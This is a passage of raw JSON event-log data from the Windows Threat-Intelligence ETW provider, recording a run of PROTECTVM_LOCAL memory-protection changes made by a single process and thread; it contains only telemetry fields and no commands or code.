type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":81,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909698,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C7C0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"32","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":82,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909711,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":83,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909724,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":84,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909777,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CA40","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":85,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909790,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C950","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365CA40","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":86,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909803,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C5E0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C810","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":87,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909816,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":88,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909828,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C540","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":89,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909840,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C540","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":90,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909853,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C4A0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":91,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909865,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":92,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909878,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C590","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":93,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909891,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C9F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":94,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909914,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"128","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":95,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973909936,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CA40","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C540","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":96,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910092,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C8B0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":97,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910115,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":98,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910127,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C6D0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":99,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910139,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":100,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910152,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":101,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910166,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":102,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910178,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":103,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910192,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C8B0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C630","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":104,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910204,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C8B0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":105,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910216,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C4F0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":106,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910228,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown 